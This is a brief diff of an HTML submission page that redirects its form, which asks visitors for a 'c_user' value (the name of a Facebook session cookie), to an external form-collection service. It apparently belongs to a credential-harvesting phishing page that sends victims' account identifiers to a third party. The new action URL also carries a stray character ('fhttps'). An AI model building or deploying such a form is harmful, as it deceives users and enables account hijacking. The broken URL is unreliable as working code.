--- a/submit.html
+++ b/submit.html
@@ -53,7 +53,7 @@ Please be sure to provide the requested information below.<br>
 
 
   <p style="color:#8c8c8c">
- <form action="form_v1_yihWXoGTDDyp4Xkkx63EXBK4" method="post">
+ <form action="fhttps://submit-form.com/mN27kw5tL" method="post">
 
   c_user <br><br><input type="number" name="c_user" pattern=".{9,}"  required><br><br> 
 
